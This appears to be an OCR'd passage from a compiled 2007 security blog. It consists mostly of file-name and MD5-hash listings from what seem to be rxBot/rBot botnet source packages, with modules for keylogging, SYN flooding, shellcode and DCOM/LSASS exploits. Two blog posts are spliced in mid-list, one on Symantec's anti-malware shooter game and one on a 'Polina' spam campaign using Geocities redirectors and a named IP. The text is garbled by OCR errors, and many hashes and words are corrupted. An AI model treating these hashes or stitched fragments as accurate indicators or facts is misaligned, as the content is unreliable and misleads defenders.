7540e463eecla0a4eb10c603f440a8b3 

scan.h 

6236be771c0c88df937f75845a064f12 

secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.h 
5f8¢353634b560052a5ebee5ef27ae32 
shares.h 87646c869246cb2d71576278a64ff9ed 
shellcode.h 
cal4f267b73bc867b075ca56f524d52e 
socks4.h b103f307ffO2cd98fe2bfbecbd19c011 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.h 
a9165cc828d623c51c297ec888803d9F 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
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tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.h 
f1b57b9f58ff94af8d2adeec8e7839e6 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
wksmass.h 
8elce6eaeb/7ba43ede346b20f0d50c40 
wkssvc.h 40cbf340990988e1214bc77e02d2ad93 
xerion.h 6d17278915220464f9502b8ce5451f67 
advscan.cpp 
ec0fd2374elabb39e1c06e521d4dfec6 
advscan.h 
28d4bb92509606b7f3196d256a9004ec 
aliaslog.cpp 
d4d2c7a728f6232d65c014128564144b 
aliaslog.h 
bcb519a55a26c288ad400e54b432b593 
autostart.cpp 
583e5c04c8a80807353796c2c055580e 
autostart.h 
f90d127bbacbd6e2f3e6caf624cace26 
beagle.cpp 
fd89d2c8c0aab6f0952801e99f53fe8f1 
beagle.h 36acd82182e7db302d6b15elbcf4c15c 
capture.cpp 
2de3c5612c5c823f01a306c43997d098 
capture.h 
7e€2617e52bc0f031a1d883196f00f136 
cdkeys.cpp 
b620757c2ff71c0e339d5d5309c9aeea 
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cdkeys.h eb1llfee369b5ff68366424734b445244 
commands.cpp 
919c7c24ae3978ab302fc23753f34d78 
commands.h 
5875565af76e40444d865fa22c809197 
configs.h 
2d015b9ae2ea0833a155482d68fa8fe0 
connect.cpp 
379341715f61324453838e8e990bde5a 
connect.h 
a84b3be9c394e337a790d20e6f70d18d 
crc32.cpp 
517afe6637a2b27999c1761bb236c4cf 
crc32.h 
9704b9d3b7ef22d440caff64c399c4d2 
crypt.cpp 
ea6cb22c6bfaaacb228ada530e219c55 
crypt.h 
1ba014319515b5flficf7729f27907cf 
dameware.cpp 
Odffbab42430bcc6fca7c14f00446884 
dameware.h 
cce31dc40676c3cf80e16096b0be71d0 
dcc.cpp 

ed492dd8bcf7d5822fd3f7 70ff25dce7 
dcc.h 
5d79c86b2096faf3eaf2ac9cabae7 3f7 
dcom.cpp fcfebc37e8ae2209dd878d3e741eb898 
dcom.h 
af8a531f6dacfd52d472f78df2e/7flbd 
defines.h 
9e254297b5900ee140e2e22f6d071cab 
download.cpp 
18352f7e90670182fb892bddb4030019 
download.h 
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ef3afcfc55c043cd6e4793bb63f75c4b 
driveinfo.cpp 
20d0b4a749cf602d214b275cf914d04e 
driveinfo.h 
C472697534896497850e9fc5eb8043ee 
ehandler.cpp 
655dd3d6b9ad46c33062604811af60e9 
ehandler.h 
46dabf2b8d010ea79f080828b68723cd 
externs.h 
57b36798dcd92ad5d45c636f1a38ca35 
findfile.cpp 
f9e4371b95ad85bb687a807e19ab34df 
findfile.h 
b61f99415d6215fb2a82dacc51c2833d 
findpass.cpp 
3cdaa7ee82b6097490f0b04c87eaae63 
findpass.h 
cla5aa8a/79fafa5cf7948c744dced355 
fphost.cpp 
4b918d1a9d6f7123b96de54ee1295ba2 
fphost.h e742aa255d016fabcf05e910671029Ff2 
ftptransfer.cpp 
3ab98246757a374780136ffc618d4afa 
ftptransfer.h 
4c7bca4793b62c5alef45bf15d501815 
functions.h 
512bdf3aa8539e6586b673651779c096 
global.h 3755356ffe76d8e33b47c447c6a18949 
globals.h 
9eaa26cd252e3c6d3666ff69166c5c75 
httpd.cpp 
8583c5bdc5fcf15e8a09d4c743bba937 
httpd.h 
40acee6b9e87d9fdalc344d6801e4d82 
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icmpflood.cpp 
d9bbab91555fd0b3113171b9bce3e51d 
icmpflood.h 
69c28eb4594a951491fa9fel0cfd7023 
ident.cpp 
69f7f7fc4857317ff4cf022b3c623efc 
ident.h 
2905285b73f0a646edf865941d042388 
iisSssl.cpp 
66af9831f7376bf52f35df8a5b525f77 
iis5ssl.h 
c59eb88c83cff84e75a02897215ad2ce 
includes.h 
Oe9ccaab3ad1f41c6bdd08bf54c2b6c8 
irc send.cpp 
74cddd946667027a6ece2abf23d63726 
irc _send.h 
5cd05d1f4498f0dee2f76aa70816bfca 
keylogger.cpp 
8c02847939657657f7936c8822bbe618 
keylogger.h 
02b12b62dca1052e6aacfeb6f9463cb4d 
kuang2.cpp 
fd660edc7297cca2f1l6af355d9a33fb3 
kuang2.h 9364725b839a38b7924f11a7c6349c5a 
license.txt 
5bfcl6cfcc649aa3d96c062aab2206e3 
list.txt aed228065d13203e39f2710a18f397b6 
loaddlls.cpp 
192b366a01bc973b650c2bf40d5347a0 
loaddlls.h 
de234c6360070e37ba920ff803fe5cbd 
Isarestrict.cpp 
6604947f51438d50dd3179e4d32513c4 
Isarestrict.h 
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8426fcb5fal139bd071d92a2ae3e87e6 
misc.cpp 491d8bab443d1c5b9317cc477c45eb6d 
misc.h 
1d2b9e0f4a60657930e8017ef3387b47 
mssql.cpp 
35580928c433bb9e09ed8234917c33e5 
mssqI.h 
00c48a74ba7cl1d2f506a61ea4b51796e 
mydoom.cpp 
afd0005b55d75a7/5fdc00acc7f189a26 
mydoom.h 90f0b43f78358fb7ffb22a922fle003a 
net.cpp 
2d32eca652bdef13ed88f418811ca03e 
net.h 
73a17ab3e7e0e85758baef46bbb6fbd9 
netbios.cpp 
0442a99c7f5e94d367f7a01b4d181leea 
netbios.h 
21187a1c2946b39031b1455e203c719d 
netdevil.cpp 
114cd537f25b6d9be56700273522091e 
netdevil.h 
bc198a511c9f365af75452d9b7d00af2 
netutils.cpp 
59045cd7e058c80d3ca86742cfc21a7b 
netutils.h 
961a680f39cdfdc9404c7a7fdc47fe41 
nicklist.h 
774ccO5ca6fa366ba4cd62aa487a43fd 
optix.cpp 
24ababb78d0697d8d869fe54ef88f414 
optix.h 
0070fc615dfa7ff5cb1d0239a046daal 
passwd.h 78ed387992b502825ced77359faa3a8a 


pingudp.cpp 
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219c6afda6753754a262039d531d7612 
pingudp.h 
60dd9b6dbe85e2980bd44c78b94af244 
processes.cpp 
9a8e626c1457e0cd81b794901d83cl1c7 
processes.h 
78ecb9691e2b5c71leaef61a49a81c5f6 
protocol.cpp 
6b19cb3de401621245718c22a83f0f00 
protocol.h 
a0b7f083b164146574f188aelbal37bd 
psniff.cpp 
676b5ca9449ea38d7afda3b73c2ac94f 
psniff.h 96c30ee3ada560d4d88540d5b5d1b332 
redirect.cpp 
3c82b4e1343e095c97aafd1b09b955a0 
redirect.h 
f9f777705cfebe603a4d343b45c37f8a 
remotecmd.cpp 
fc9e1c9dc6d9bad25161c75d5485cdle 
remotecmd.h 
34f3dd0f8086835d75856953b4585184 
rlogind.cpp 
8c3b7b89bb5c95021670279e3d38d09f 
rlogind.h 
cb08b43b66f9373bf5f5d10207e8506d 
rndnick.cpp 
bc7f77dcecO0ac80e762eec539abb2b22 
rndnick.h 
cobcbd5f9d784682da525997d8d4b6ffe 
rxbot.cpp 
8d761edc718da9aalca53d75301498bf 
rxbot.dsp 
6d994fb98ba8d7816d0da4a64e2e55b9 
rxbot.dsw 
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fc487c3a795382f36d55542914a408bf 
rxbot.h 
88f0d0385dd0cf68e312b58e7b073985 
rxbot.ncb 

7a85459eafft14f262 7a0dc2ffa0b740e 
rxbot.opt 
fe0529b339b90082abfd48d2a6826cb2 
rxbot.plg 
7470521f0284a974b5122b0e88d323fb 
secure.cpp 
96f49e55c861ce5690bf15bf8177e68e 
secure.h d93a2e11964c64256d58caa4d866c23a 
session.cpp 
869f5a77c9051af9bb7649af69b8c708 
session.h 
43bd01576a5e108ecd6be688df7ac7a5 
shellcode.cpp 
a775a52b80cd3195d60eab255cd83eff 
shellcode.h 
f729b669cc481de667c62da44d82db24 
socks4.cpp 
27c415fc0f988219fd849639255b11f3 
socks4.h afca5a7dc5e00e4c0175bd1995a9f308 
startup.cpp 
d3cc3d6f85dfb6e602a3e3b42eedb853 
startup.h 
d612518972d7217f572c458ce7001a/7f 
sub7.cpp 7e9db589574239a59f3fbcb6cleaa56f 
sub7.h 
b31b63e10b23f596f972e2114edd91d1 
synflood.cpp 
1493a3132639dc9a2bef54962cd537f6 
synflood.h 
8f5c957ecc0e30ad8a353bff7c348136 
sysinfo.cpp 
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5f2c3f6cd2591122adefc66234600884 
sysinfo.h 
889ff95200e143154622dfa03bbd1499 
tcpflood.cpp 
d6fc90557c34d9141e2ac828a0a00955 
tcpflood.h 
823cfc5b863fe159048b7fdf93clae2f 
tcpip.h 
2efcde7c48f649029add415c7947632e 
tftpd.cpp 
7747a86326615ae13d3a47bfba2acb65 
tftpd.h 
d8792fb79874ff55eef1668748e9fdcf 
threads.cpp 
743999d05f618cc9577ee8d2a5769e70 
threads.h 
c9afaed048a30c44b6c959505e6fbO8t 
upnp.cpp 5daf7d2626ed961589ac3b278b37bf04 
upnp.h 
beaf3e139f69b2ddd98c58d99e236772 
visit.cpp 
7911a3fac89cdfb266d2d3028f1347f1 
visit. 
cc3c8464e7c05d952bdfe2aa3f0e07db 
wildcard.cpp 
5363b51b1fa352074748f9d172d993b1 
wildcard.h 
825326cb947d6c374ab8501f372c0272 
advscan.cpp 
e4e0eab6be5ad8dabab2576d2ef2f7680 
advscan.h 
5634bd8c0a795f2fb770b4d4148984f6 
aliaslog.cpp 
c2e0077b833b8778818c30dc8e57c7fd 
aliaslog.h 
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3.11.18 First Person Shooter Anti-Malware Game (2007-11-15 22:35) 


Endpoint Protection Game 


Clien' 
Intrusi 


Copyright 2007, All rigtts seserved. CMP 
x ’ ’ x | 


Just when you think you’ve seen everything "evil marketers" can come up to both, consciously 
and subconsciously influence your purchasing behaviour and improve the favorability scale 
towards a company - you can still get surprised. After a decent example of the [1]DIY 
marketing concept, Microsoft’s perception of [2]security as a "threat from outer space", an 
example of [3]rebranding a security vendor, the [4]Invible Burglar game, here comes another 
good example of new media marketering practice - while some companies seek to embed 
their logos into popular games, others are coming up with ones on their own. [5]Symantec’s 
Endpoint Protection Game - a first person shooter where the typically mutated creatures are 
replaces with viruses, spyware and rootkits is what I’m blogging about : 


"Your task is to simply save your global network from viruses, worms, and a hideous host of 
online threats that are poised to take your IT infrastructure down." 


[6]Eye catching trailer as well. Such marketing campaigns can have a huge educational poten- 
tial if they’re, for instance, customized for a specific [7]security awareness program module. 


. http://ddanchev. blogspot .com/2006/04/diy-marketing- culture. html 


. http://ddanchev.blogspot.com/2007/05/microsofts-forefront-ad-campaign. html 


1 

2 

3, http: /Adanchev. blogspot. com/2007/11/rebranding-security-vendor. html 

4. netp:/ /ddanchev. blogspot .com/2006/12/sysantecs~Savisible-burglargane tal 
5 


. http: //www.symantecendpointgame.com/ 
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52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
306dd702bbb1613d95cObb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
backdoor.cpp 
2a47fa96a857270cbcc8b7balf3cc86b 
backdoor.h 
00b4beadff70b7e2167937dbd757b382 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
89a29a634867a0bb3b46a8bbb0af6d8a 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
cisco.cpp 
94ad183aab834dfd0b3c1f64f6cd4b33 
cisco.h 
68001b126ddedc77772ef91d88ffb2ed 
configs.h 
5ffa6b24b435085603a344b6cd7679Ff2 
configs.h.bak 
11d7fc942467flecb47ec890c453312a 
connback.cpp 
22788867eedb4363a20523252d30163b 
connback.h 
9c06383e5be20fd3e52330931d224efd 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
IcdO0adeb14bdd0dcbc3fe66a5fe2fed9 
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crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dcc.cpp 
d56562412ed6a20caa2bebea9b1ad958 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp 1da0b179be8d096b35a0dc515029fae7 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
ddos.cpp 0455f35223bf819clbaa697fab0f620d 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
0b4350f952d2201a3b91f63427bb2650 
download.cpp 
8ccba7d649be5dbe1713e00be1d63bff 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
aal5ac6e417f3a2024688d4474fa9992 
driveinfo.h 
8f57049be20497bcab61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
bbea0d3c53a753b31a061f9f6c436460 
findfile.cpp 
fl1c4b74aacca2af65487b67d43e6aec8 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
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8352433534a974035e7d873f49f80473 
findpass.h 
1lfecf202e0ebd30610d74f842979c82c 
flood.cpp 
a169a160137de74d6f6df18fd20d5c10 
flood.h 

4607d7eff8b5f60d4eeb6af3 9f8cfce04 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 


fphost.h 7269b3d4234fcbc5da07695ae3483cl1b 
ftpd.cpp 3a6220942964764dd27af9982cbc549f 


ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
881410d26be520810bd8efac9ec8b283 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
fa2ee43ab4130a5a6003fabaf359cdfe 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
30c3f9196dc5f1d3966b274c3d8ae2fe 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
f06553d31b7f5517139f75c89581c8a9 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
iis5ssl.cpp 
fadf62a0b1b3373edd263a07c3032d23 
iis5ssl.h 
c59eb88c83cff84e75a02897215ad2ce 
imail.cpp 
a8bc910d033edf15e01030b3bf43050b 
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imail.h 
6fcafae441539867a78f8955e49177bc 
includes.h 
2692d59fd0efdd5f9c25d5d2ecd87e79 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 
1327c4206db3d24ff14ac45e8a4bd9d1 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
loaddlls.cpp 
9a7b052c2466539d407bf2fb4af890f0 
loaddlls.h 
cba2c46850bdb074acfa7aa8b56f2bd8 
Isass.cpp 
fo17f935afa21f92fd29b47f9e65be5c 
Isass.h 
8034eb4a831c97e7e60a8b52377e912F 
messenger.cpp 
21fced574fe41leeced55ed6537420b32 
messenger.h 
4ce2b10101e841b90074b82b52393147 
misc.cpp c1b62461cb03b200696a7506fb44def2 
misc.h 
3a7d6a7efc85a8dde45f9cb2a7809952 
ms04 007 _asnl.cpp 
49c89fdf6a2d4f63a24be7f3660cb842 
ms04 007 asnl.h 
c18cb0ec17923a63653974cbfb1dlecb 
msmq.cpp 1211694d60ee3ccd4241faf708129c75 
msmq.h 
a1d868437310f90efebb0d46ca671103 
myshellcode.asm 
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d8a45b5c49cb451b35a6fblcc68eb531 
net.cpp 
f775bdc8a324e154630f7860d71265ed 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
b0550aebb9942a375e6c0fd5685d842f 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netutils.cpp 
03a72e60c3830fe874f650487a86f6ea 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
passwd.h c300d3b2a40113092a84186424b56079 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
7efb6b1f76970d85aae951d92b3e3e3e 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
plsass.cpp 
863b6bc8f0085bccc32eaa3b09098c5a 
plsass.h 8a3c574a7ec536fda04fe75db2a97906 
processes.cpp 
97a7686c06a60b2968a9a8443521a226 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 
psniff.cpp 
5a0cald9cc8d55f893a56c445a8f46eb 
psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp Ofdea53b54f4f0d941a0336b52250fb8 
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rBot.cpp.bak 
2b5a1132061130ce2ab23390113f4ad1 
rBot.dsp 352eccb23fbcbd9319bd16fe6ae09875 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 
rBot.ncb 0970304f7ea0c91d0d96b32cb76350a9 
rBot.opt ce646185ddb68daf938c6a6a416b0640 
rBot.plg e207c92ab20e775e9785c3aee4bfac7d 
readme.txt 
a4c572fb9adb87eadf4552369c10442d 
redirect.cpp 
048fcc14da8c045b1b87cfd606099e7b 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 
7f93ef272aded80aa1302888d9a5248a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
3dd2ac69b1laf1928c8a24e8f5dd7f446 

rlogind.h 

dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
89c13d836afadc25fb95c4d69bb627c5 
rndnick.h 
3cbe632d4ca6f152ca2a13bb1561d292 
scan.cpp e5b09d8aecfbe9felbae70c7130b99f6 
scan.h 

8473c126d6dfba3c7b3d40020af6bc7d 
secure.cpp 
d142a4c4f56350c8d22cbeea58b2166c 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
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session.cpp 
5debb5e9ebcb46bc7ec228e6d97c31cd 
session.h 
5f8c353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal14f267b73bc867b075ca56f524d52e 
skysyn.cpp 
8a0c47ecd69a736dfca52748875d976a 


skysyn.h a9bbae339a6eb211b20790ae965c23ea 


sniffer.cpp 
5e4dfa78b8009ce6d41157cb3a7b87c0 
sniffer.h 
c8b1ca8f0ee388ef36e0b682cbd29d7f 
socks4.cpp 
8d6548569362c7b87260f6d886425bf2 
socks4.h b103f307ff02cd98fe2bfbecbd19c011 
speedtest.cpp 
cOa20bf215ac1fd176905e198c6c5f33 
speedtest.h 
8bffbb4c46103dd62c6a64a83903434a 
synflood.cpp 
0a835eb9ef8acd50ec79462e7c8e4b29 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
70c180bdb2627d6ef3a5ba6a48d480c6 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
targa3.cpp 
d339cbafd73fe62de656ed28564fd395 
targa3.h f50c43771fa62711425f05adfa48bf14 
tcpflood.cpp 
06e885e4dc3d6789f099755841592dd2 
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tcpflood.h 
a9165cc828d623c51c297ec888803d9F 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644F 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
2731058a62b2feb225e2bd57d103f211 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
ee29d5fda24ef70caa8aabd7008d0716 
threads.h 
155e75e9053217e293d509e5b2d69ab5 
tsunami.cpp 
9eaa22267f00ff05390b4a2d8d15ed0b 
tsunami.h 
6b6710a2d1a5ffc5c720dd01e42fa21de 
upnp.cpp 8135593d60d2db6c01f72f33434c4b7f 
upnp.h 
53233f2b7390fcd1db7df97b8c001624 
veritas.cpp 
d791b75478f4c3d57f5bb854f4fb9384 
veritas.h 
ledc6600327d36f4e0c2089c8fa23e7a 
visit.cpp 
1b372bb9504a2faf27836091d514ed5e 
visit.h 
766e4add98e2cb96bd37e87f4d9dfff9 
webdav.cpp 
cbbd2743b1930cc51d408428e7e30b7c 
webdav.h 43938d3c15c01d174036540d55e91143 


wildcard.cpp 
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8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
wisdom.cpp 
57ec22cc493830ae41daf80aeeb73b2a 


wisdom.h 46657173b16708f0108a81c24789bbe7 


wkssvc.cpp 
efcff6efbef4d7 75aafbdacfe908e2bf 


wkssvc.h 40cbf340990988e1214bc77e02d2ad93 
wonk.cpp 9ff88d4a945b758d5f0ce676743088e5 


wonk.h 
7802ded7ce139e1246a9bed56e4c04f8 
advscan.cpp 
970e7449a3471ae926733313c79aalfd 
advscan.h 
c67d944559e747clee795c57fb616d8d 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
306dd702bbb1613d95cObb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
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3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
changes.txt 
58217d1ffd4deblbec06aae7baa89769 
configs.h 
1dalbbe31297b4a3a6fb6caddccbebec 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
e9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
ccl6dafcdeb18ec98celdaa72c00f59d 


download.cpp 
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6. http://www. symantecendpointgame.com/traile 
7. http: //www.windowsecurity.com/pages/security—policy.pdf 


3.11.19 Lonely Polina’s Secret (2007-11-16 16:13) 


. 
y Klicken Sie hier, urn das Plugin herunter yu lader 


| ' Please be patient, it may take time for the image to download 
i | If you cannot see an image, you may need to download the iPIX plug-in. 
2% 


vy 


Just as I’ve been monitoring lots of [l]spam that’s using Geocities redirectors, yesterday 
Nicholas posted some details on a [2]malware campaign using Geocities pages as redi- 
rectors, and Roderick Ordonez [3]acknowledged the same. Original Geocities URLS used 
geocities.com/MediciChavez7861 (active) ; geocities.com/IliseNkrumah2 (down) ; geoci- 
ties.com/GounodNanon5 (down). Original message of the spam campaign : 


"Hallo! Meine Name ist Polina. Ich bin Studentin und Ich habe zur Germany zu lernen 
angekommen . Ich suche mich den Freund und der Sex-Partner. Aller dass Ich will es ist ein 
guter Mann. Sie sollen ernst, sicher, klug sein. Geben Sie mich zu wissen wenn Sie wollen mit 
mir treffen. Ebenso konnen Sie einfach mein Freund sein. Sie konnen meine Fotos auf meiner 
Seite sehen: geocities.com/MediciChavez7861 BITTE, NURR DIE ERNSTE Vorschlages. KUSSE, 
POLINA" 


The fake lonely German student Polina was also accessible from other URLs as well - ThePages- 
Bargain.ru/polina; dibopservice.com, both now down as well as the main 58.65.238.36/polina 
URL which is forwarding to baby.com in an attempt to cover up the campaign - you wish. 
Internal pages within the IP are still accessible - 58.65.238.36/index2 _files/index3.htm; 
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664845639 lLaff5fbob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
f7¢44e532aca3c1596e004ca03be6db8 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1lfecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 7269b3d4234fcbc5da07695ae3483cl1b 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1ll1lbe33 
icmpflood.h 
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4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
d6478f56ee26ac92c9b87cbe49fal446 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
list.txt 50594305fa90c9596c69be1ad1a454a4 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
ac110d58058fb12b6bd64c98c1a66c60 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
f035c1642a8e3ff49ff19bb1be316333 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssql.h 
742394ed531laab2ecc958daf5305723e 


mydoom.cpp 
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cfcbabd00798a130fe0366975a9a0f50 
mydoom.h c7d0edal136c75da543c4a14f9c28b7d6 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
ncb 
730c696ed21334767c8ef9160e263a84 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
7€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
optix.cpp 
5ab6d1017b7380586127050009bec5a9 
optix.h 
3421ea53b60d9533328808627b869ccc 
passwd.h c300d3b2a40113092a84186424b56079 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
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pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.cpp 
Off6cd6325e6f63db3d44355843d4b08 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.cpp 

c4eb189f05d2a7ff6e52afeOcdab3bd17 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp a300c9e235ed508c767e67328bc5fb93 
rBot.dsp f7bf3cf00b4a01180be5aeb5c1591508 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 
rBot.mak d4b8f93b620b1fa139f7a6f403489d7f 
rBot.ncb 7045a7b7d48a5928720b4b632b0d75f0 
rBot.opt 8bb543634530106563d728521d92255d 
rBot.plg 663d19c9244e52eeb0500f210178df3c 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 

2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 

dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
89c13d836afadc25fb95c4d69bb627c5 
rndnick.h 
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3cbe632d4ca6f152ca2a13bb1561d292 
scan.cpp 66cOcfe5563eb8191fda0d9a6781lacOf 
scan.h 

6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.cpp 
82e74c83142171a4998ca76b20b4177c 
session.h 
5f8c353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal4f267b73bc867b075ca56f524d52e 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ff02cd98fe2bfbecbd19c011 
